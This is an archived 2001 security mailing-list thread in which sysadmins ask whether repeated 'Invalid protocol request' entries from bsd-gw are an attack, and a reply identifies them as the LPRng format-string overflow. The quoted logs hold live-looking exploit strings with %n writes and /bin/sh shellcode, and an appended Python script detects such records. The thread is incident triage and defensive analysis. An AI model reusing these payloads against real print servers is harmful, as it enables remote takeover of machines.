Re: Am I Under Attack?

From: John (johnsat_private)
Date: Thu Apr 12 2001 - 15:15:40 PDT


    Hi Tim. I am going to take a guess, but this looks like
    the LPRng overflow, specifically the shellcode used. I
    could be wrong because this shellcode is used in other
    attacks as well.
    
    
    Tim Brown wrote:
    >
    > I tried to post this to the list earlier this week, but it never got here.
    >
    > A sysadmin found about 35 of these entries over a few seconds in her log this
    > morning (4/9/2001).  Any ideas?
    >
    > Apr  5 21:30:27 sun1 bsd-gw[28481]: Invalid protocol request
    > (66):
    >
    > BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    >
    > "Leite, Zailo" wrote:
    >
    > > We've been getting this on messages since yesterday. Is this a worm trying
    > > to propagate?
    > >
    > > Z
    > >
    > > Apr  9 10:26:32 bing.bong.edu bsd-gw[25383]: Invalid protocol request (66):
    > > BBBXYZ[XXXXXXXXXXXXXXXXXX%.24u%300$n%.165u%301$n%.253u%302$n%.192u%303$n111F
    > > 1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    > > Apr  9 10:26:33 bing.bong.edu bsd-gw[25387]: Invalid protocol request (66):
    > > BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.181u%301$n%.253u%302$n%.192u%303$n1
    > > 11F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    > > Apr  9 10:26:33 bing.bong.edu bsd-gw[25388]: Invalid protocol request (66):
    > > BBBDEFGXXXXXXXXXXXXXXXXXXsecu%300$n%.185u%301$n%.253u%302$n%.192u%303$n111F1
    > > f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
    >
    > --
    >
    > Tim Brown
    > Network Security Analyst
    
    --
    The events which transpired five thousand years ago;
    Five years ago or five minutes ago, have determined
    what will happen five minutes from now; five years
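
The log entries quoted in this thread carry printf-style directives (`%.<width>u` padding and positional `%<n>$n` writes) inside the "Invalid protocol request" text. The following is an added detection example, not part of the original messages: it re-joins wrapped syslog records and reports those containing positional `%n` writes. The function names, the sample host name and the sample lines are assumptions constructed for illustration.

```python
import re

# Start of a syslog record: "Apr  9 10:26:32 host prog[pid]: message"
RECORD_START = re.compile(r"^[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d \S+ (\S+?)\[\d+\]: ")
# printf directives of interest: %<pos>$n stores the output count through the
# <pos>-th argument; %.<width>u pads the output to steer the stored value.
POSITIONAL_WRITE = re.compile(r"%(\d+)\$h{0,2}n")
PADDING = re.compile(r"%\.(\d+)u")


def join_records(lines):
    """Re-join records that syslog or a mail client wrapped across lines."""
    records = []
    for line in lines:
        if RECORD_START.match(line) or not records:
            records.append(line.rstrip("\n"))
        else:
            records[-1] += line.strip()
    return records


def scan(lines):
    """Return one finding per record carrying positional %n write directives."""
    findings = []
    for record in join_records(lines):
        m = RECORD_START.match(record)
        writes = [int(p) for p in POSITIONAL_WRITE.findall(record)]
        if not m or not writes:
            continue
        findings.append({
            "program": m.group(1),
            "write_positions": writes,
            "padding_widths": [int(w) for w in PADDING.findall(record)],
            "shell_string": "/bin/sh" in record,
        })
    return findings


# Constructed sample input, shaped like the entries quoted in the thread.
SAMPLE = [
    "Apr  9 10:26:32 host1 bsd-gw[101]: Invalid protocol request (66):",
    "BBBXXXX%.24u%300$n%.165u%301$n%.253u%302$n",
    "%.192u%303$nAAAA/bin/sh",
    "Apr  9 10:27:01 host1 bsd-gw[102]: Invalid protocol request (10): hello",
    "Apr  9 10:27:05 host1 sshd[103]: Accepted publickey for alice",
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Only the first constructed record is reported; the ordinary invalid request and the sshd line contain no positional write directive and are skipped.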
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:27:53 PDT